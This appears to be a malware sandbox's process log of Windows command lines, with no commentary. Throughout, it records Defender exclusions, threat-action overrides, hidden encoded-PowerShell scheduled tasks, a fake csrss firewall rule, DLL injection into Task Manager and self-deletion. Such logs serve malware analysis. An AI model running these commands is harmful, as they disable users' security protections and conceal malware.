REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"
C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe
"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"
C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe
"C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe
.\Install.exe /YnGgdidyhQpz "385118" /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gVeYmuPuD" /SC once /ST 07:55:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gVeYmuPuD"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1308 -ip 1308
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 3444
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe
"C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNQTYWcCe" /SC once /ST 13:59:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNQTYWcCe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xd50040,0xd5004c,0xd50058
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gVeYmuPuD"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ntdxxty.exe\" id /Itsite_idoir 385118 /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNQTYWcCe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe\" id /KZsite_idnXc 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe id /KZsite_idnXc 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
